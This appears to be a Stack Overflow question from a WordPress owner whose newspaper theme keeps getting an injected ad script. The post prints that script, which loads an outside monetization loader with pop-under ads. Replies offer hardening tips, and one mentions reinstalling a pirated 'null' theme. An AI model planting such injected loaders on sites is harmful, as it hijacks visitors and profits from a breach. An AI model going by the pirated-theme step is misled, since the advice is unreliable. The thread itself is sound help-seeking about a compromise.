# How to determine how someone is hacking my WordPress site?

Tags: javascript, wordpress, wordpress-theming, wordpress-thesis-theme

Somebody add an adv code in my website in every two days. I remove it and then on the second day, it's come back.

I already changed my WordPress website password and nothing more. And yes, the adv code automatically appears in my newspaper theme panel.

Till now it's been 6 days, but other than this adv code I really can't see anything strange.

And I'm the only user in my WordPress Panel too.

Here's the code:

```
<script type="text/javascript">//<![CDATA[ 
(function() {
    var configuration = {
    "token": "f17143abbffd1edf14788c13fa8a1b08",
    "entryScript": {
        "type": "click",
        "capping": {
            "limit": 5,
            "timeout": 24
        }
    },
    "exitScript": {
        "enabled": true
    },
    "popUnder": {
        "enabled": true
    }
};
    var script = document.createElement('script');
    script.async = true;
    script.src = '//cdn.shorte.st/link-converter.min.js';
    script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
    var entry = document.getElementsByTagName('script')[0];
    entry.parentNode.insertBefore(script, entry);
})();
//]]></script>
```

Comment: change your wp-admin directory, harder password you should need to use. admin username and password should be stronger and different you can use security plugin.

Comment: any suggestion for a security plugin?

Comment: and for "change your wp-admin directory" can this help https://wordpress.org/plugins/protect-wp-admin/

Comment: yes, it is and much more but it will help you to change your wp-admin directory name.

Comment: Apply .htpassword for wp-admin directory as well.

Answer (score 0):

i use newspaper theme too, and got hit too, same kind of code, try to change admin login page, remove admin and is password make new one, change orther pass users, reinstall newer theme (null), ftp change permissions of theme and plugin too but still got hit again, so i don't think all those change got any resust any way.
So i try my last act before im going to re install everything include worpress is self, i sended a mail to shorte.st with the javascrip askking them to find out this individual and to block them.
By the way, you need to check the setting too at the who can register section, is does change from supcrible to admin. fix that firt. Hope this help.

Comment: Hi ! It would be better if you checkout [How to create a Minimal, Complete, and Verifiable example](http://stackoverflow.com/help/mcve) of your code for future endeavor at Stack overflow. -Thank you